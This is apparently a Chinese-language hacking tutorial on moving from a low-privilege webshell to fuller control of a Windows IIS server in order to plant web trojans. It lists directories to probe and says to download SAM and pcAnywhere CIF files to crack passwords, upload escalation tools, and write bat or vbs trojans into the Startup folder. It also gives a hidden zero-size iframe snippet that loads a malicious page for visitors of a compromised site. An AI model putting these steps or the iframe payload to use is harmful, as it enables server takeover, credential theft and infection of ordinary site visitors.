簡單突破使用權限設定漏洞掛馬

簡單突破使用權限設定漏洞掛馬

今天我要說一下使用權限設定的問題，有時候我們拿到了一個shell,但許可權太低，只能在拿到sehll的網站的目錄瞎逛，對於我這樣喜歡在伺服器網站掛馬的人來說太痛苦了。

拿一個例子吧 ，比如asp注入，動網，動感，動易，塵緣等等漏洞，好多的，反正不管怎樣我們現在有個shell

當我們取得一個webshell時候，主要要做的就是看看有什末許可權,來提升許可權，有許可權才能知道個個盤都有什末東東，這裡的學問很多，

c: d: e:.....
C:/Documents and Settings/All Users/「開始」菜單/程式/
  看這裡能不能跳轉，我們從這裡可以擷取好多有用的資訊比如Serv-U的路徑，

C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/
看能否跳轉到這個目錄，如果行那就最好了，直接下它的CIF檔案，破解得到pcAnywhere密碼，登陸
c:/Program Files/serv-u/

C:/WINNT/system32/config/
下它的SAM，破解密碼

c:/winnt/system32/inetsrv/data/
是erveryone 完全控制，很多時候沒作限制，把提升許可權的工具上傳上去，然後執行
c:/prel
C:/Program Files/Java Web Start/
c:/Documents and Settings/
C:/Documents and Settings/All Users/
c:/winnt/system32/inetsrv/data/
c:/Program Files/
c:/Program Files/serv-u/
C:/Program Files/Microsoft SQL Server/
c:/Temp/
c:/mysql/(如果伺服器支援PHP）
c:/PHP(如果伺服器支援PHP）

運行"cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps"來提升許可權

還可以用這段代碼試提升，好象不是很理想的

如果主機設定很變態，可以試下在c:/Documents and Settings/All Users/「開始」菜單/程式/啟動"寫入bat，vbs等木馬。

冰狐網頁木馬比較常用，掛馬的代碼</html><iframe src="http://*****.htm" name="zhu" width="0" height="0" frameborder="0">

關於防護方面JHACKJ做過一個變態設定教程，大家看看吧，呵呵，給他做廣告了，